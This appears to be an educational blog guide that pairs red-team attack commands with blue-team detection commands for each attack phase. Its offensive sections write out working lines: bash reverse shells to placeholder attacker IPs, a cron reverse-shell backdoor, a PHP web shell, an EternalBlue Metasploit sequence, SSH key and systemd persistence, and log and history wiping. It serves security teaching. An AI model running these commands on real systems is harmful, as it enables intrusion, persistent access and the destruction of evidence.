You have heard the terms. Red team attacks. Blue team defends. But when you look at the actual commands, what is the difference?
The answer is not the tools themselves. A command like nmap -sV 192.168.1.1 can be used by either team. The difference is intent, timing, and what you do with the output.
Red teams use commands to find weaknesses and exploit them. Blue teams use commands to detect those exploits and stop them. One is offensive, the other is defensive. Let me show you exactly how this plays out in practice.
LEGAL WARNING
This guide is for educational purposes and authorized testing only. Using these commands on systems you do not own or have explicit written permission to test is illegal. These techniques are for use in legitimate security assessments, CTF competitions, and your own lab environments.
YOU HAVE BEEN WARNED.
The Fundamental Difference
Red teams and blue teams use the same Linux commands, but they use them differently. A red teamer runs ps aux to find processes they can exploit or to see what security tools are running.
A blue teamer runs the same command to spot malicious processes that should not be there.
The difference is intent. One is offensive. The other is defensive. Red teams concentrate on access, lateral movement, and cover their footprints.
Blue teams concentrate on detection, hardening, and triggering alarms. Red teams perform their activities using a hidden command.
Blue teams perform their activities using a more verbose command. Red teams remove any traces of log activity.
Blue teams inspect logs to detect intrusions. The command is one and the same, but the intent reverses it. Mature organizations frequently switch roles and share information through purple teaming to eliminate the silo effect.
Reconnaissance Commands
Red Team: Searching for Vulnerable Entry Points
First, the red team creates a map of the target organization. It scans the target for open ports, active services, and possible vulnerabilities.
Nmap port scan command:
nmap -sV -p- -T4 192.168.1.0/24
In this command, Nmap scans all ports of the entire subnet with version detection.Timing parameter (-T4) is used to speed up the scanning process. Version detection (-sV) is needed to detect vulnerable software versions.
TCP connect scan command:
nc -zv 192.168.1.1 1-1000 2>&1Netcat uses -z flag to perform port scanning in zero I/O mode. The same utility can be used to pull service banners and set up reverse shells. Red teams employ this method in case Nmap cannot be used for some reason.
Subdomain enumeration:
python3 sublist3r.py -d target.com -o subdomains.txt
In this way, red teams discover the subdomains with potentially less protected applications. In general, red teams try to find obsolete and neglected systems. They usually feature poor protection.
DNS enumeration:
dnsrecon -d target.com -t axfr
Here we try a DNS zone transfer. It allows us to discover all hosts in the domain. Red teams employ this method to find those internal hosts that were not advertised to the outside world. A successful zone transfer provides a lot of valuable data.
Blue Team: Detecting the Scan
Blue teams watch for the exact same traffic. They spot the patterns before the attacker gets a foothold. The aim is to identify reconnaissance before it turns into an exploit.
SYN scan monitoring:
sudo tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'
The above command is used to capture TCP SYN packets which form the basis of a port scan. The blue team members look out for an excessive number of SYN packets being sent by the same source IP. This indicates scanning activities.
Firewall logging:
sudo iptables -A INPUT -j LOG --log-prefix "SCAN_DETECT"
This command helps in logging all incoming traffic and makes scans visible in the system logs. The blue team can detect any scanning from the logs provided with the log prefix.
Traffic analysis in the network:
sudo tcpdump -i eth0 -w capture.pcap
The blue team captures the network traffic in a file for analysis. It can be later on replayed and analyzed using the Wireshark tool.
Network connections monitoring:
netstat -tulnp
It will display all the open ports and connections. Blue teams search for suspicious ports or processes that do not belong. An unauthorized port open is considered as a possible backdoor.
Scan detection using log analysis:
grep “Failed password” /var/log/auth.log | awk ‘{print $11}’ | sort | uniq -c | sort -nr
It will reveal the number of failed attempts by the IP address. Blue teams analyze such information for detecting brute force attacks. If there are several failed attempts by the same IP then it is under attack.
Exploitation Commands
Red Team: Gaining a Foothold
The process of exploitation involves taking advantage of any vulnerabilities that have been discovered. In this case, the penetration test progresses to an actual exploitation phase. The aim is to establish a shell on the target machine.
Commands in the Metasploit Framework:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST YOUR_IP
exploit
The above commands will create a reverse shell connection on a Windows machine with EternalBlue vulnerability.
Hydra brute-forcing:
hydra -l admin -P passwords.txt ssh://target_ip
Brute-forces the SSH authentication via the passwords stored in passwords.txt belonging to admin user. The script is often used by the red teams when they have common password list or previous breach credentials.
Custom reverse shell:
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
A simple one-liner for bash reverse shell. Commands are typically obfuscated by red teams to avoid detection. It simply redirects standard input, output, and error streams to the TCP connection.
Web shell staging:
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
Red teams deploy web shells in case of patching of the vulnerability to be able to execute commands remotely. Web shells are very small in size and can easily be hidden amongst other files.
Blue Team: Detecting the Exploit
There are many techniques blue teams use to detect such exploits. The detection must take place during or right after the exploit so as to avoid more damage.
Process Creation Monitoring:
ps aux | grep -i "malicious"
This command detects any suspicious process name. Blue teams look for any processes that do not belong in that system or those that are running odd command lines.
Checking for Reverse Shells:
netstat -tulnp | grep 4444
This is used to find connections on reverse shell ports. Blue teams detect any unexpected connections.A connection to a non-standard port from an internal system is suspicious.
Real-time log file monitoring:
tail -f /var/log/auth.log
Blue teams monitor authentication logs in real time to detect any brute-force attacks or logins coming from suspicious locations.
System processs monitoring with eBPF:
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_execve
{ printf("%s executed %s\n", comm, str(args->filename)); }'
eBPF is used here to monitor all process executions happening in the system. Blue teams use this method to detect any unauthorized process executions. This provides visibility into every command run on the system.
Persistence Commands
Red Team: Remaining Inside
Following the initial infiltration, red teams employ persistence mechanisms to ensure that should the machine be restarted or the backdoor discovered, they have means by which they can get back inside.
Cron Job Backdoor:
echo '* * * * * /bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' >> /etc/crontab
This is used to create a scheduled task that executes the reverse shell every one minute. These cron jobs are usually hidden in directories not often accessed.The task runs even after the system is rebooted.
Service through Systemd:
echo '[Service]\nExecStart=/opt/backdoor\n' > /etc/systemd/system/backdoor.service
systemctl enable backdoor.service
This sets up a service that can run when the OS boots up. Red teams name such services to make them appear to be official parts of the system. This service executes with system-level permissions.
Authorized SSH key:
echo 'ssh-rsa AAA...' >> ~/.ssh/authorized_keys
This sets an authorized key to allow access to the box without needing a password. Red teams use this to set up clean access. Even if the backdoor gets deleted, the key gives access.
Blue Team: Persistence Hunting
A blue team searches for persistence methods. It is essential to find such methods before the hacker uses them again.
Schedule tasks list:
systemctl list-timers --all
crontab -l
This command will display all scheduled tasks, whether or not the hacker added them. Blue teams investigate all tasks executing suspicious commands. An unknown task is instantly investigated.
Check authorized ssh keys:
cat ~/.ssh/authorized_keys
This will give you all the keys allowed access to your machine. All unauthorized keys will be deleted by the blue team. Unauthorized key means compromise.
Check changes in profile:
auditctl -w /etc/profile -p wa -k profile_changes
This will log all the changes made in the login profiles of Linux using auditing system. Blue teams get an alert in case of any modification in the profile file.
Check services in systemd:
systemctl list-unit-files --type=service
This command gives all the services, including those which boot at startup. Blue teams check for any unknown or suspicious services.
Evasion of Defense Commands
Red Team: Track Deception
The red teams are always attempting to evade detection. They make use of obfuscation techniques for their commands, split attacks, and make their operations appear legitimate system operations.
Reverse shell obfuscation:
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' | base64
Base64 encoding of commands will evade simple string-based detection. These commands are decoded and run by the red team in the memory and not stored in the disk itself.
Clearing logs in case of log files:
cat /dev/null > /var/log/auth.log
This will remove logs from the authentication log file used by the red team. Syslog and btmp are examples of other log files that can be cleared by the red team.
Clearing command history:
history -c
rm ~/.bash_history
This will help clear the command history from the shell. Red teams use this technique to cover up their activities in case of investigation.
Modification of timestamps:
touch -r /bin/ls backdoor
It changes the modification date of a file by comparing it with the other file. The red team uses this tactic to give the impression that the backdoor is a valid file.
Blue Team: Detecting Evasion
The blue team is aware of these tactics of evasion and looks out for them. The detection of the evasion technique can be the initial indication of an advanced attack.
Detection of encoded commands:
strings /var/log/syslog | grep -i "base64"
It searches the logs for encoded string. Blue teams investigate any encoded commands found in logs. Encoding is often used to hide malicious activity.
Check if logs have been deleted:
auditctl -w /var/log/auth.log -p wa -k auth_log
Blue teams examine system logs for any tampering, including deletions. Deletion of logs is a sure indicator of an attack trying to hide its tracks. Logs can be audited for any modification.
Integrity check on files:
aideinit && aide --check
Using the AIDE program, it is possible to see if any files have been modified without authorization. Blue teams run this regularly to spot modified system files.
Look for timestamps change:
find / -type f -newer /bin/ls -exec ls -la {} \;
In this way, we search for the files that have been modified after a specific system file. This is one of the ways used by the blue team to identify recently changed files.
Post-Exploitation Commands
Red Team: Lateral Movement
When the red team compromises one system, it proceeds to navigate the network to compromise critical targets. This process is referred to as lateral movement.
Privilege escalation:
find / -perm -4000 -type f 2>/dev/null
This is the command used to search for the presence of SUID binaries that can be used by the red team to escalate privileges.
SMB lateral movement:
net use \\192.168.1.20\C$ /user:DOMAIN\Administrator Password123
This is how the red team maps a network drive with stolen credentials and transfers files from one computer to another.
Pivot scan using Nmap:
nmap -sV -p- 192.168.1.0/24
The red team performs recon on the compromised machine to find out other targets. This allows the identification of internal machines that were not previously seen from the outside.
Blue Team: Detecting Lateral Movement
The blue team detects these same methods of movement as well. Detecting the lateral movement early prevents further attack on critical systems.
Monitoring SMB connections:
tcpdump -i eth0 port 445
This method monitors the SMB connections, which can be used in lateral movement. The blue team detects unusual SMB connections between workstations.
Look for privilege escalation:
sudo -l
It tells you which commands a user can run with elevated privileges. The blue team will be looking for any unexpected processes. Every user that can run administrative commands is a threat.
Process ancestry:
pstree -p
It displays the process ancestry. The blue team will be searching for any unusual child processes. A web server executing a command shell indicates compromise.
The Bottom Line
Red teams and blue teams use the same Linux commands, but they use them with completely different purposes.
A red teamer runs ps aux to find processes they can exploit or to see what security tools are running. A blue teamer runs the same command to spot malicious processes that should not be there.
The difference is intent, timing, and context. One is offensive. The other is defensive. The best defenders are those who have broken into systems and remember each step. That empathy drives resilient security architecture.
Master both sides. Practice the commands. Understand the intent. You will become a better security professional regardless of which side you are on.
FAQ Section
What is the difference between the commands of the red team and blue team?
It is possible to use the same commands for both teams. While the red teams will use these commands offensively in order to detect any weaknesses in the system and exploit them, the blue teams will use them defensively in order to detect any attacks and prevent them.
Do blue teams ever make use of penetration testing tools?
Yes, the blue teams use tools such as Nmap and Wireshark in order to map out their networks and discover any misconfigurations. The difference is they are scanning their own systems to find problems before attackers do.
What is a purple team?
It is the combination of efforts of a red and blue team working together. The red team will demonstrate its tactics, and the blue team will learn how to recognize them.
Which commands would you use for each of the teams?
Nmap for reconnaissance, netstat/ss for connections, tcpdump for traffic, ps for processes monitoring.
How could I practice both red and blue team skills?
By setting up my own lab with Kali Linux (for attacker) and Windows 10 (with Sysmon) (for target). There are different paths for red team training on TryHackMe platform and for blue team on CyberDefenders.
